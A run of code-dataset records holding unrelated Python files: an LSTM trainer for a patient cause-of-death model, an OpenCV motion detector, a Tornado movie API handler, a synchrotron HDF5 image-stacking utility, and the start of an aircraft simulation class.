yet.\n if child.stat().st_size > 20480:\n if epoch > highestepoch or (iteration > highestiter and epoch == highestepoch):\n highestepoch = epoch\n highestiter = iteration\n if highestepoch == 0 and highestiter == 0:\n print(\"nothing to load\")\n return computer, optim, starting_epoch, starting_iteration\n pickle_file = Path(task_dir).joinpath(\n \"saves/\" + savestr + \"/lstmnorm_\" + str(highestepoch) + \"_\" + str(highestiter) + \".pkl\")\n print(\"loading model at\", pickle_file)\n with pickle_file.open('rb') as pickle_file:\n computer, optim, epoch, iteration = torch.load(pickle_file)\n print('Loaded model at epoch ', highestepoch, 'iteartion', iteration)\n\n return computer, optim, highestepoch, highestiter\n\ndef salvage():\n # this function will pick up the last two highest epoch training and save them somewhere else,\n # this is to prevent unexpected data loss.\n # We are working in a /tmp folder, and we write around 1Gb per minute.\n # The loss of data is likely.\n\n task_dir = os.path.dirname(abspath(__file__))\n save_dir = Path(task_dir) / \"lstmsaves\"\n highestepoch = -1\n secondhighestiter = -1\n highestiter = -1\n for child in save_dir.iterdir():\n epoch = str(child).split(\"_\")[3]\n iteration = str(child).split(\"_\")[4].split('.')[0]\n iteration = int(iteration)\n epoch = int(epoch)\n # some files are open but not written to yet.\n if epoch > highestepoch and iteration > highestiter and child.stat().st_size > 20480:\n highestepoch = epoch\n highestiter = iteration\n if highestepoch == -1 and highestiter == -1:\n print(\"no file to salvage\")\n return\n if secondhighestiter != -1:\n pickle_file2 = Path(task_dir).joinpath(\"lstmsaves/lstm_\" + str(highestepoch) + \"_\" + str(secondhighestiter) + \".pkl\")\n copy(pickle_file2, \"/infodev1/rep/projects/jason/pickle/lstmsalvage2.pkl\")\n\n pickle_file1 = Path(task_dir).joinpath(\"lstmsaves/lstm_\" + str(highestepoch) + \"_\" + str(highestiter) + \".pkl\")\n copy(pickle_file1, \"/infodev1/rep/projects/jason/pickle/salvage1.pkl\")\n\n print('salvaged, we can start again with /infodev1/rep/projects/jason/pickle/lstmsalvage1.pkl')\n\nglobal_exception_counter=0\ndef run_one_patient(computer, input, target, target_dim, optimizer, loss_type, real_criterion,\n binary_criterion, validate=False):\n global global_exception_counter\n patient_loss=None\n try:\n optimizer.zero_grad()\n input = Variable(torch.Tensor(input).cuda())\n target = Variable(torch.Tensor(target).cuda())\n\n # we have no critical index, becuase critical index are those timesteps that\n # DNC is required to produce outputs. This is not the case for our project.\n # criterion does not need to be reinitiated for every story, because we are not using a mask\n\n patient_output=computer(input)\n cause_of_death_output = patient_output[:, :, 1:]\n cause_of_death_target = target[:, :, 1:]\n patient_loss= binary_criterion(cause_of_death_output, cause_of_death_target)\n\n if not validate:\n patient_loss.backward()\n optimizer.step()\n\n if global_exception_counter>-1:\n global_exception_counter-=1\n except ValueError:\n traceback.print_exc()\n print(\"Value Error reached\")\n print(datetime.datetime.now().time())\n global_exception_counter+=1\n if global_exception_counter==10:\n save_model(computer,optimizer,epoch=0,iteration=global_exception_counter)\n raise ValueError(\"Global exception counter reached 10. Likely the model has nan in weights\")\n else:\n pass\n\n return patient_loss\n\n\ndef train(computer, optimizer, real_criterion, binary_criterion,\n train, valid_dl, starting_epoch, total_epochs, starting_iter, iter_per_epoch, savestr, logfile=False):\n valid_iterator=iter(valid_dl)\n print_interval=10\n val_interval=200\n save_interval=800\n target_dim=None\n rldmax_len=50\n val_batch=100\n running_loss_deque=deque(maxlen=rldmax_len)\n if logfile:\n open(logfile, 'w').close()\n\n for epoch in range(starting_epoch, total_epochs):\n for i, (input, target, loss_type) in enumerate(train):\n i=starting_iter+i\n if target_dim is None:\n target_dim=target.shape[2]\n\n if i < iter_per_epoch:\n train_story_loss = run_one_patient(computer, input, target, target_dim, optimizer, loss_type,\n real_criterion, binary_criterion)\n if train_story_loss is not None:\n printloss=float(train_story_loss[0])\n else:\n raise ValueError(\"Why would story loss be None?\")\n running_loss_deque.appendleft(printloss)\n if i % print_interval == 0:\n running_loss=np.mean(running_loss_deque)\n logprint(logfile, \"learning. count: %4d, training loss: %.10f, running loss: %.10f\" %\n (i, printloss, running_loss))\n\n\n if i % val_interval == 0:\n printloss=0\n for _ in range(val_batch):\n # we should consider running validation multiple times and average. TODO\n try:\n (input,target,loss_type)=next(valid_iterator)\n except StopIteration:\n valid_iterator=iter(valid_dl)\n (input,target,loss_type)=next(valid_iterator)\n\n val_loss = run_one_patient(computer, input, target, target_dim, optimizer, loss_type,\n real_criterion, binary_criterion, validate=True)\n if val_loss is not None:\n printloss += float(val_loss[0])\n else:\n raise ValueError (\"Investigate this\")\n printloss=printloss/val_batch\n logprint(logfile, \"validation. count: %4d, val loss : %.10f\" %\n (i, printloss))\n\n if i % save_interval == 0:\n save_model(computer, optimizer, epoch, i, savestr)\n print(\"model saved for epoch\", epoch, \"input\", i)\n else:\n break\n\ndef valid(computer, optimizer, real_criterion, binary_criterion,\n train, valid_dl, starting_epoch, total_epochs, starting_iter, iter_per_epoch, logfile=False):\n running_loss=[]\n target_dim=None\n valid_iterator=iter(valid_dl)\n\n for i in valid_iterator:\n input, target, loss_type=next(valid_iterator)\n val_loss = run_one_patient(computer, input, target, target_dim, optimizer, loss_type,\n real_criterion, binary_criterion, validate=True)\n if val_loss is not None:\n printloss = float(val_loss[0])\n running_loss.append((printloss))\n if logfile:\n with open(logfile, 'a') as handle:\n handle.write(\"validation. count: %4d, val loss : %.10f \\n\" %\n (i, printloss))\n print(\"validation. count: %4d, val loss: %.10f\" %\n (i, printloss))\n print(np.mean(running_loss))\n\n\nclass lstmwrapper(nn.Module):\n def __init__(self,input_size=66529, output_size=5952,hidden_size=52,num_layers=16,batch_first=True,\n dropout=0.1):\n super(lstmwrapper, self).__init__()\n self.lstm=LSTM(input_size=input_size,hidden_size=hidden_size,num_layers=num_layers,\n batch_first=batch_first,dropout=dropout)\n self.output=nn.Linear(hidden_size,output_size)\n self.bn = nn.BatchNorm1d(input_size)\n self.reset_parameters()\n\n def reset_parameters(self):\n self.lstm.reset_parameters()\n self.output.reset_parameters()\n\n def forward(self, input, hx=None):\n input=self.bn(input)\n output,statetuple=self.lstm(input,hx)\n return self.output(output)\n\nclass lstmwrapper2(nn.Module):\n def __init__(self,input_size=66529, output_size=5952,hidden_size=52,num_layers=16,batch_first=True,\n dropout=0.1):\n super(lstmwrapper, self).__init__()\n self.lstm=LSTM(input_size=input_size,hidden_size=hidden_size,num_layers=num_layers,\n batch_first=batch_first,dropout=dropout)\n self.output=nn.Linear(hidden_size,output_size)\n self.reset_parameters()\n\n def reset_parameters(self):\n self.lstm.reset_parameters()\n self.output.reset_parameters()\n\n def forward(self, input, hx=None):\n output,statetuple=self.lstm(input,hx)\n return self.output(output)\n\ndef validationonly():\n '''\n :return:\n '''\n\n lr = 1e-2\n optim = None\n logfile = \"vallog.txt\"\n\n num_workers = 8\n ig = InputGenH()\n # multiprocessing disabled, because socket request seems unstable.\n # performance should not be too bad?\n trainds = ig.get_train()\n validds = ig.get_valid()\n validdl = DataLoader(dataset=validds,num_workers=num_workers, batch_size=1)\n print(\"Using\", num_workers, \"workers for validation set\")\n # testing whether this LSTM works is basically a question whether\n lstm = lstmwrapper()\n\n # load model:\n print(\"loading model\")\n lstm, optim, starting_epoch, starting_iteration = load_model(lstm, optim, 0, 0)\n\n lstm = lstm.cuda()\n if optim is None:\n optimizer = torch.optim.Adam(lstm.parameters(), lr=lr)\n else:\n # print('use Adadelta optimizer with learning rate ', lr)\n # optimizer = torch.optim.Adadelta(computer.parameters(), lr=lr)\n optimizer = optim\n\n real_criterion = nn.SmoothL1Loss()\n binary_criterion = nn.BCEWithLogitsLoss()\n\n traindl=None\n total_epochs=None\n iter_per_epoch=None\n\n # starting with the epoch after the loaded one\n valid(lstm, optimizer, real_criterion, binary_criterion,\n traindl, validdl, int(starting_epoch), total_epochs,int(starting_iteration), iter_per_epoch, logfile)\n\ndef main(load,savestr):\n total_epochs = 3\n iter_per_epoch = 100000\n lr = 1e-3\n optim = None\n starting_epoch = 0\n starting_iteration= 0\n logstring = str(datetime.datetime.now().time())\n logstring.replace(\" \", \"_\")\n logfile = \"log/\"+savestr+\"_\"+logstring+\".txt\"\n\n num_workers = 8\n ig = InputGenF(death_fold=0)\n trainds = ig.get_train()\n validds = ig.get_valid()\n validdl = DataLoader(dataset=validds, batch_size=8, num_workers=num_workers, collate_fn=pad_collate)\n traindl = DataLoader(dataset=trainds, batch_size=8, num_workers=num_workers//4, collate_fn=pad_collate)\n\n print(\"Using\", num_workers, \"workers for training set\")\n # testing whether this LSTM works is basically a question whether\n lstm=lstmwrapper()\n\n # load model:\n if load:\n print(\"loading model\")\n lstm, optim, starting_epoch, starting_iteration = load_model(lstm, optim, starting_epoch, starting_iteration, savestr)\n\n lstm = lstm.cuda()\n if optim is None:\n optimizer = torch.optim.Adam(lstm.parameters(), lr=lr)\n else:\n # print('use Adadelta optimizer with learning rate ', lr)\n # optimizer = torch.optim.Adadelta(computer.parameters(), lr=lr)\n optimizer = optim\n\n real_criterion = nn.SmoothL1Loss()\n binary_criterion = nn.BCEWithLogitsLoss()\n\n # starting with the epoch after the loaded one\n\n train(lstm, optimizer, real_criterion, binary_criterion,\n traindl, validdl, int(starting_epoch), total_epochs,\n int(starting_iteration), iter_per_epoch, savestr, logfile)\n\n\nif __name__ == \"__main__\":\n # main(load=True\n main()\n\n '''\n lr=1e-4 is extremely slow.\n This is probably because I averaged the loss across the whole sequence? Why is this not a problem for Tacotron?\n '''","repo_name":"phimachine/mayoehr","sub_path":"death/trashcan/lstmtrainer.py","file_name":"lstmtrainer.py","file_ext":"py","file_size_in_byte":13831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69962784091","text":"import cv2\nimport numpy as np\nimport time\nfrom matplotlib import pyplot as plt\n\ncap = cv2.VideoCapture(1)\ntime.sleep(0.25)\n_, img = cap.read()\n\nbgref =img.copy()\nbgref =cv2.cvtColor(bgref,cv2.COLOR_BGR2GRAY)\nbgref = cv2.GaussianBlur(bgref, (21, 21), 0)\n\ncv2.imshow(\"Background\",bgref)\nwhile(1):\n\n # Take each frame\n _, img = cap.read()\n \n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n \n frameDelta = cv2.absdiff(bgref, gray)\n thresh = cv2.threshold(frameDelta, 10, 255, cv2.THRESH_BINARY)[1]\n \n # dilate the thresholded image to fill in holes, then find contours\n # on thresholded image\n thresh = cv2.dilate(thresh, None, iterations=1)\n cv2.imshow(\"thresh\",thresh)\n cnts= cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[1]\n \n # loop over the contours\n for c in cnts:\n # if the contour is too small, ignore it\n (x, y, w, h) = cv2.boundingRect(c)\n if w<100 or h<100:\n continue\n \n # compute the bounding box for the contour, draw it on the frame,\n # and update the text\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n \n cv2.imshow(\"obj\",img)\n \n k = cv2.waitKey(25) & 0xFF\n if k == 27:\n break\n \ncap.release()\ncv2.destroyAllWindows()","repo_name":"arjunprakash05/OpenCV_Realtime_Project","sub_path":"temp12.py","file_name":"temp12.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19595028705","text":"# -*- coding: utf-8 -*-\n'''\nCreated on Mar 11, 2013\n\n@author: Fang Jiaguo\n'''\nfrom handlers.base_handler import BaseHandler, user_profile\nfrom settings import mongodb\nfrom utilities import JSONEncoderExt\nimport json\nimport tornado.gen\nimport tornado.web\n\nclass MovieCategoryAPIHandler(BaseHandler):\n @user_profile\n @tornado.web.asynchronous\n @tornado.gen.engine\n def get(self):\n \"\"\"Movie category API.\n\n :query string sort: Sort result by which field (optional).\n :query string start: Start index of the movie list (optional, TOTAL_ACCESSABLE_MOVIES > $start >= 0).\n :query string limit: Limited number of movies in a single request (optional, MOVIES_PER_REQUEST >= $limit > 0).\n\n This API doesn't need to be authorized.\n \"\"\"\n # query string: sort\n sort_field = self.get_argument('sort', None)\n if sort_field not in self.SORT_FIELDS:\n sort_field = None\n if sort_field:\n sort = [(sort_field, -1)]\n else:\n sort = None\n\n # query string: start\n start = self.get_argument('start', 0)\n try:\n start = int(start)\n except:\n start = 0\n if start < 0:\n start = 0\n\n # query string: limit\n limit = self.get_argument('limit', self.MOVIES_PER_REQUEST)\n try:\n limit = int(limit)\n except:\n limit = self.MOVIES_PER_REQUEST\n if limit <= 0 or limit > self.MOVIES_PER_REQUEST:\n limit = self.MOVIES_PER_REQUEST\n\n # User can only access a fixed amount of movies.\n if start < self.TOTAL_ACCESSABLE_MOVIES:\n try:\n result, error = yield tornado.gen.Task(mongodb['movies'].find,\n fields={'summary': 0},\n skip=start,\n limit=min(limit, self.TOTAL_ACCESSABLE_MOVIES - start), # important!\n sort=sort)\n movies = result[0]\n except:\n raise tornado.web.HTTPError(500)\n if error.get('error'):\n raise tornado.web.HTTPError(500)\n else:\n movies = []\n\n response = {\n 'movies': movies,\n 'total': len(movies),\n 'start': start,\n 'limit': limit\n }\n self.write(json.dumps(response, cls=JSONEncoderExt))\n self.finish()\n","repo_name":"jiaguofang/right-channel","sub_path":"projects/right-channel-web/apis/movie_category_api_handler.py","file_name":"movie_category_api_handler.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18883125585","text":"import os\nimport time\n\nimport h5py\nimport pprint\nimport numpy as np\nfrom operator import itemgetter\n\nfrom joblib import Parallel, delayed\n\nfrom tinydb import TinyDB, Query\nfrom tinydb.storages import JSONStorage\nfrom tinydb.middlewares import CachingMiddleware\nfrom tinydb.storages import MemoryStorage\n\nfrom txm2nexuslib.parser import get_file_paths\nfrom txm2nexuslib.images.util import filter_file_index, dict2hdf5\n\n\ndef create_structure_dict(type_struct=\"normalized\"):\n # Construct a dictionary with the metadata structure representing\n # the future hdf5 structure\n if type_struct == \"normalized\":\n hdf5_metadata_structure_dict = {\"TomoNormalized\": {\n \"AverageFF\": [],\n \"Avg_FF_ExpTime\": [],\n \"CurrentsFF\": [],\n \"CurrentsTomo\": [],\n \"ExpTimesTomo\": [],\n \"energy\": [],\n \"rotation_angle\": [],\n \"x_pixel_size\": [],\n \"y_pixel_size\": []}\n }\n elif (type_struct == \"normalized_multifocus\" or\n type_struct == \"normalized_simple\"):\n hdf5_metadata_structure_dict = {\"TomoNormalized\": {\n \"energy\": [],\n \"rotation_angle\": [],\n \"x_pixel_size\": [],\n \"y_pixel_size\": []}\n }\n elif type_struct == \"normalized_spectroscopy\":\n hdf5_metadata_structure_dict = {\"SpecNormalized\": {\n \"energy\": [],\n \"rotation_angle\": [],\n \"x_pixel_size\": [],\n \"y_pixel_size\": []}\n }\n elif type_struct == \"normalized_magnetism_many_repetitions\":\n hdf5_metadata_structure_dict = {\"TomoNormalized\": {\n \"energy\": [],\n \"rotation_angle\": [],\n \"x_pixel_size\": [],\n \"y_pixel_size\": [],\n \"jj_offset\": []}\n }\n elif type_struct == \"aligned\" or type_struct == \"aligned_multifocus\":\n hdf5_metadata_structure_dict = {\"FastAligned\": {\n \"energy\": [],\n \"rotation_angle\": [],\n \"x_pixel_size\": [],\n \"y_pixel_size\": []}\n }\n else:\n pass\n return hdf5_metadata_structure_dict\n\ndef metadata_2_stack_dict(hdf5_structure_dict,\n files_for_stack, ff_filenames=None,\n type_struct=\"normalized\",\n avg_ff_dataset=\"data\"):\n \"\"\" Transfer data from many hdf5 individual image files\n into a single hdf5 stack file.\n This method is quite specific for normalized BL09 images\"\"\"\n\n data_filenames = files_for_stack[\"data\"]\n\n num_keys = len(hdf5_structure_dict)\n if num_keys == 1:\n k, hdf5_structure_dict = hdf5_structure_dict.items()[0]\n\n def extract_metadata_original(metadata_original, hdf5_structure_dict):\n for dataset_name in hdf5_structure_dict:\n if dataset_name in metadata_original:\n value = metadata_original[dataset_name].value\n if (dataset_name == \"energy\" and\n type_struct != \"normalized_spectroscopy\"):\n value = round(value, 1)\n elif (dataset_name == \"energy\" and\n type_struct == \"normalized_spectroscopy\"):\n value = round(value, 2)\n hdf5_structure_dict[dataset_name].append(value)\n\n if type_struct == \"normalized_magnetism_many_repetitions\":\n jj_offset = files_for_stack[\"jj_offset\"]\n hdf5_structure_dict[\"jj_offset\"] = [jj_offset]\n\n c = 0\n for file in data_filenames:\n # print(file)\n f = h5py.File(file, \"r\")\n # Process metadata\n metadata_original = f[\"metadata\"]\n extract_metadata_original(metadata_original, hdf5_structure_dict)\n if (type_struct == \"normalized\" or\n type_struct == \"normalized_simple\" or\n type_struct == \"normalized_multifocus\" or\n type_struct == \"normalized_magnetism_many_repetitions\" or\n type_struct == \"normalized_spectroscopy\" or\n type_struct == \"aligned\" or\n type_struct == \"aligned_multifocus\"):\n if c == 0:\n hdf5_structure_dict[\"x_pixel_size\"].append(\n round(metadata_original[\"pixel_size\"].value, 6))\n hdf5_structure_dict[\"y_pixel_size\"].append(\n round(metadata_original[\"pixel_size\"].value, 6))\n if (\"energy\" not in hdf5_structure_dict and\n type_struct != \"normalized_spectroscopy\"):\n hdf5_structure_dict[\"energy\"].append(\n round(metadata_original[\"energy\"].value, 1))\n elif (\"energy\" not in hdf5_structure_dict and\n type_struct == \"normalized_spectroscopy\"):\n hdf5_structure_dict[\"energy\"].append(\n round(metadata_original[\"energy\"].value, 2))\n hdf5_structure_dict[\"rotation_angle\"].append(\n round(metadata_original[\"angle\"].value, 1))\n if type_struct == \"normalized\":\n hdf5_structure_dict[\"ExpTimesTomo\"].append(\n round(metadata_original[\"exposure_time\"].value, 2))\n hdf5_structure_dict[\"CurrentsTomo\"].append(\n round(metadata_original[\"machine_current\"].value, 6))\n f.close()\n c += 1\n\n c = 0\n if ff_filenames and type_struct == \"normalized\":\n for ff_file in ff_filenames:\n f = h5py.File(ff_file, \"r\")\n metadata_original = f[\"metadata\"]\n # Process metadata\n if c == 0:\n hdf5_structure_dict[\"Avg_FF_ExpTime\"].append(\n metadata_original[\"exposure_time\"].value)\n hdf5_structure_dict[\"AverageFF\"] = f[avg_ff_dataset].value\n hdf5_structure_dict[\"CurrentsFF\"].append(\n metadata_original[\"machine_current\"].value)\n f.close()\n c += 1\n if num_keys == 1:\n hdf5_structure_dict = {k: hdf5_structure_dict}\n return hdf5_structure_dict\n\n\ndef data_2_hdf5(h5_stack_file_handler,\n data_filenames, ff_filenames=None,\n type_struct=\"normalized\",\n dataset=\"data\"):\n \"\"\"Generic method to create an hdf5 stack of images from individual\n images\"\"\"\n\n if (type_struct == \"normalized\" or\n type_struct == \"normalized_simple\" or\n type_struct == \"normalized_multifocus\" or\n type_struct == \"normalized_magnetism_many_repetitions\"):\n main_grp = \"TomoNormalized\"\n main_dataset = \"TomoNormalized\"\n if ff_filenames and type_struct == \"normalized\":\n ff_dataset = \"FFNormalizedWithCurrent\"\n elif type_struct == \"normalized_spectroscopy\":\n main_grp = \"SpecNormalized\"\n main_dataset = \"spectroscopy_normalized\"\n elif type_struct == \"aligned\" or type_struct == \"aligned_multifocus\":\n main_grp = \"FastAligned\"\n main_dataset = \"tomo_aligned\"\n else:\n pass\n\n num_img = 0\n for file in data_filenames:\n # Images normalized\n f = h5py.File(file, \"r\")\n if num_img == 0:\n n_frames = len(data_filenames)\n num_rows, num_columns = np.shape(f[dataset].value)\n h5_stack_file_handler[main_grp].create_dataset(\n main_dataset,\n shape=(n_frames, num_rows, num_columns),\n chunks=(1, num_rows, num_columns),\n dtype='float32')\n h5_stack_file_handler[main_grp][main_dataset].attrs[\n 'Number of Frames'] = n_frames\n h5_stack_file_handler[main_grp][main_dataset][\n num_img] = f[dataset].value\n f.close()\n num_img += 1\n\n if ff_filenames and type_struct == \"normalized\":\n # FF images normalized by machine_current and exp time\n num_img_ff = 0\n for ff_file in ff_filenames:\n f = h5py.File(ff_file, \"r\")\n if num_img_ff == 0:\n n_ff_frames = len(ff_filenames)\n num_rows, num_columns = np.shape(f[dataset].value)\n h5_stack_file_handler[main_grp].create_dataset(\n ff_dataset,\n shape=(n_ff_frames, num_rows, num_columns),\n chunks=(1, num_rows, num_columns),\n dtype='float32')\n h5_stack_file_handler[main_grp][ff_dataset].attrs[\n 'Number of Frames'] = n_ff_frames\n h5_stack_file_handler[main_grp][ff_dataset][\n num_img_ff] = f[dataset].value\n f.close()\n num_img_ff += 1\n\n\ndef make_stack(files_for_stack, root_path, type_struct=\"normalized\",\n suffix=\"_stack\"):\n\n data_files = files_for_stack[\"data\"]\n if \"ff\" in files_for_stack:\n data_files_ff = files_for_stack[\"ff\"]\n else:\n data_files_ff = None\n date = files_for_stack[\"date\"]\n sample = files_for_stack[\"sample\"]\n if type_struct != \"normalized_spectroscopy\":\n energy = files_for_stack[\"energy\"]\n if \"zpz\" in files_for_stack:\n zpz = files_for_stack[\"zpz\"]\n elif type_struct == \"normalized_magnetism_many_repetitions\":\n jj_offset = files_for_stack[\"jj_offset\"]\n\n # Creation of dictionary\n h5_struct_dict = create_structure_dict(type_struct=type_struct)\n data_dict = metadata_2_stack_dict(h5_struct_dict,\n files_for_stack,\n ff_filenames=data_files_ff,\n type_struct=type_struct)\n\n # Creation of hdf5 stack\n if type_struct == \"normalized\":\n h5_out_fn = (str(date) + \"_\" + str(sample) + \"_\" +\n str(energy) + \"_\" + str(zpz) + suffix + \".hdf5\")\n elif (type_struct == \"normalized_multifocus\" or\n type_struct == \"normalized_simple\"):\n h5_out_fn = (str(date) + \"_\" + str(sample) + \"_\" +\n str(energy) + suffix + \".hdf5\")\n elif type_struct == \"normalized_spectroscopy\":\n h5_out_fn = (str(date) + \"_\" + str(sample) +\n suffix + \".hdf5\")\n elif type_struct == \"normalized_magnetism_many_repetitions\":\n h5_out_fn = (str(date) + \"_\" + str(sample) + \"_\" +\n str(energy) + \"_\" + str(jj_offset) + suffix + \".hdf5\")\n if type_struct == \"aligned\":\n h5_out_fn = (str(date) + \"_\" + str(sample) + \"_\" +\n str(energy) + \"_\" + str(zpz) + suffix + \"_ali.hdf5\")\n if type_struct == \"aligned_multifocus\":\n h5_out_fn = (str(date) + \"_\" + str(sample) + \"_\" +\n str(energy) + suffix + \"_ali.hdf5\")\n h5_out_fn = root_path + \"/\" + h5_out_fn\n h5_stack_file_handler = h5py.File(h5_out_fn, \"w\")\n dict2hdf5(h5_stack_file_handler, data_dict)\n data_2_hdf5(h5_stack_file_handler,\n data_files, ff_filenames=data_files_ff,\n type_struct=type_struct)\n\n h5_stack_file_handler.flush()\n h5_stack_file_handler.close()\n # Record does not contain energy and zpz because in some cases\n # the same stack could contain many different energies or\n # many different zpz\n record = {\"filename\": os.path.basename(h5_out_fn),\n \"extension\": \".hdf5\",\n \"date\": date, \"sample\": sample, \"stack\": True}\n record.update({\"type\": type_struct})\n return record\n\n\ndef many_images_to_h5_stack(file_index_fn, table_name=\"hdf5_proc\",\n type_struct=\"normalized\", suffix=\"_stack\",\n date=None, sample=None, energy=None, zpz=None,\n ff=None, subfolders=False, cores=-2):\n \"\"\"Go from many images hdf5 files to a single stack of images\n hdf5 file.\n Using all cores but one, for the computations\"\"\"\n\n # TODO: spectroscopy normalized not implemented (no Avg FF, etc)\n print(\"--- Individual images to stacks ---\")\n start_time = time.time()\n file_index_db = TinyDB(file_index_fn,\n storage=CachingMiddleware(JSONStorage))\n db = file_index_db\n if table_name is not None:\n file_index_db = file_index_db.table(table_name)\n\n files_query = Query()\n if (date is not None or sample is not None or energy is not None or\n zpz is not None or ff is not None):\n file_index_db = filter_file_index(file_index_db, files_query,\n date=date, sample=sample,\n energy=energy,\n zpz=zpz, ff=ff)\n\n root_path = os.path.dirname(os.path.abspath(file_index_fn))\n all_file_records = file_index_db.all()\n stack_table = db.table(\"hdf5_stacks\")\n stack_table.purge()\n files_list = []\n\n if type_struct == \"normalized\" or type_struct == \"aligned\":\n dates_samples_energies_zpzs = []\n for record in all_file_records:\n dates_samples_energies_zpzs.append((record[\"date\"],\n record[\"sample\"],\n record[\"energy\"],\n record[\"zpz\"]))\n dates_samples_energies_zpzs = list(set(dates_samples_energies_zpzs))\n for date_sample_energy_zpz in dates_samples_energies_zpzs:\n date = date_sample_energy_zpz[0]\n sample = date_sample_energy_zpz[1]\n energy = date_sample_energy_zpz[2]\n zpz = date_sample_energy_zpz[3]\n\n # Query building parts\n da = (files_query.date == date)\n sa = (files_query.sample == sample)\n en = (files_query.energy == energy)\n zp = (files_query.zpz == zpz)\n ff_false = (files_query.FF == False)\n ff_true = (files_query.FF == True)\n\n data_files_ff = []\n if file_index_db.search(files_query.FF.exists()):\n # Query command\n query_cmd_ff = (da & sa & en & ff_true)\n h5_ff_records = file_index_db.search(query_cmd_ff)\n data_files_ff = get_file_paths(h5_ff_records, root_path,\n use_subfolders=subfolders)\n if file_index_db.search(files_query.FF.exists()):\n # Query command\n query_cmd = (da & sa & en & zp & ff_false)\n else:\n # Query command\n query_cmd = (da & sa & en & zp)\n h5_records = file_index_db.search(query_cmd)\n h5_records = sorted(h5_records, key=itemgetter('angle'))\n\n data_files = get_file_paths(h5_records, root_path,\n use_subfolders=subfolders)\n files_dict = {\"data\": data_files, \"ff\": data_files_ff,\n \"date\": date, \"sample\": sample, \"energy\": energy,\n \"zpz\": zpz}\n files_list.append(files_dict)\n elif (type_struct == \"normalized_multifocus\" or\n type_struct == \"normalized_simple\" or\n type_struct == \"aligned_multifocus\"):\n dates_samples_energies = []\n for record in all_file_records:\n dates_samples_energies.append((record[\"date\"],\n record[\"sample\"],\n record[\"energy\"]))\n dates_samples_energies = list(set(dates_samples_energies))\n for date_sample_energy in dates_samples_energies:\n date = date_sample_energy[0]\n sample = date_sample_energy[1]\n energy = date_sample_energy[2]\n\n # Query building parts\n da = (files_query.date == date)\n sa = (files_query.sample == sample)\n en = (files_query.energy == energy)\n\n # Query command\n query_cmd = (da & sa & en)\n h5_records = file_index_db.search(query_cmd)\n h5_records = sorted(h5_records, key=itemgetter('angle'))\n\n data_files = get_file_paths(h5_records, root_path,\n use_subfolders=subfolders)\n files_dict = {\"data\": data_files, \"date\": date, \"sample\": sample,\n \"energy\": energy}\n files_list.append(files_dict)\n\n elif type_struct == \"normalized_magnetism_many_repetitions\":\n dates_samples_energies_jjs = []\n for record in all_file_records:\n dates_samples_energies_jjs.append((record[\"date\"],\n record[\"sample\"],\n record[\"energy\"],\n record[\"jj_offset\"]))\n\n dates_samples_energies_jjs = list(set(dates_samples_energies_jjs))\n for date_sample_energy_jj in dates_samples_energies_jjs:\n date = date_sample_energy_jj[0]\n sample = date_sample_energy_jj[1]\n energy = date_sample_energy_jj[2]\n jj_offset = date_sample_energy_jj[3]\n\n # Raw image records by given date, sample and energy\n query_cmd = ((files_query.date == date) &\n (files_query.sample == sample) &\n (files_query.energy == energy) &\n (files_query.jj_offset == jj_offset))\n h5_records = file_index_db.search(query_cmd)\n h5_records = sorted(h5_records, key=itemgetter('angle'))\n data_files = get_file_paths(h5_records, root_path,\n use_subfolders=subfolders)\n files_dict = {\"data\": data_files, \"date\": date, \"sample\": sample,\n \"energy\": energy, \"jj_offset\": jj_offset}\n files_list.append(files_dict)\n elif type_struct == \"normalized_spectroscopy\":\n dates_samples = []\n for record in all_file_records:\n dates_samples.append((record[\"date\"],\n record[\"sample\"]))\n dates_samples = list(set(dates_samples))\n for date_sample in dates_samples:\n date = date_sample[0]\n sample = date_sample[1]\n\n # Query building parts\n da = (files_query.date == date)\n sa = (files_query.sample == sample)\n\n # Query command\n query_cmd = (da & sa)\n h5_records = file_index_db.search(query_cmd)\n h5_records = sorted(h5_records, key=itemgetter('energy'))\n\n data_files = get_file_paths(h5_records, root_path,\n use_subfolders=subfolders)\n files_dict = {\"data\": data_files, \"date\": date, \"sample\": sample}\n files_list.append(files_dict)\n\n # Parallelization of making the stacks\n records = Parallel(n_jobs=cores, backend=\"multiprocessing\")(\n delayed(make_stack)(files_for_stack, root_path,\n type_struct=type_struct, suffix=suffix\n ) for files_for_stack in files_list)\n\n stack_table.insert_multiple(records)\n pretty_printer = pprint.PrettyPrinter(indent=4)\n print(\"Created stacks:\")\n for record in stack_table.all():\n pretty_printer.pprint(record[\"filename\"])\n db.close()\n\n print(\"--- Individual images to stacks took %s seconds ---\\n\" %\n (time.time() - start_time))\n\n\ndef main():\n\n file_index = \"/home/mrosanes/TOT/BEAMLINES/MISTRAL/DATA/\" \\\n \"PARALLEL_IMAGING/PARALLEL_XRM2H5/TOMOFEW/tomo_few_2/\" \\\n \"index.json\"\n\n db = TinyDB(file_index)\n a = db.table(\"hdf5_proc\")\n print(a.all())\n\n #many_images_to_h5_stack(file_index, type_struct=\"normalized\")\n\n many_images_to_h5_stack(file_index, table_name=\"hdf5_averages\",\n type_struct=\"normalized\")\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"ALBA-Synchrotron/bl09-imaging","sub_path":"txm2nexuslib/images/imagestostack.py","file_name":"imagestostack.py","file_ext":"py","file_size_in_byte":19704,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"24579692858","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef _pi_bound_deg(u):\r\n u_sat = np.mod(u, 360)\r\n\r\n if u_sat > 180:\r\n y = u_sat - 360\r\n else:\r\n y = u\r\n\r\n return y\r\n\r\n\r\nclass ACEnvironment2D:\r\n _pos_m = None\r\n _pos_history = None\r\n _vel_mps = None # Velocity\r\n\r\n _bank_rad = None # Bank angle , radians\r\n _flightpath_rad = None # flight path angle , radians\r\n _heading_rad = None # heading angle , radians\r\n\r\n _cmd_bank_rad = None\r\n 